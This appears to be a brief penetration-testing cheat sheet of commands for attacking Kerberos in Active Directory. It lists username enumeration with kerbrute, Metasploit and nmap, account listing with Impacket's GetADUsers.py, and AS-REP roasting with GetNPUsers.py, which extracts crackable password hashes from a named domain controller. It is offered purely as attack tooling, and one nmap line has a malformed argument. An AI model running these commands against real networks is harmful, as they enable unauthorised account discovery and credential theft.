https://github.com/ropnop/kerbrute
./kerbrute_linux_amd64 userenum --dc <IP> -d <domain> usernames.txt 
#Metasploit
use auxiliary/gather/kerberos_enumusers
set TIMEOUT 20

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/usernames.txt <IP>

#Authenticated | Impacket
GetADUsers.py -all <domain\User> -dc-ip <DC_IP>

nmap --script krb5-enum-users --script args krb5-enum-users.realm=domain_name

#Impacket 
GetNPUsers.py -dc-ip 172.31.3.9 spray.csl/ -usersfile names.txt -outputfile NPNUsers_output -format john